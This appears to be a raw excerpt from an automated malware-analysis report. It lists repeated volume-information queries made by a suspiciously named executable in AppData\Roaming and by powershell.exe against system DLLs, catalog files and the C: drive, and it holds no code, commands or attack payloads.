                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Queries volume information: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
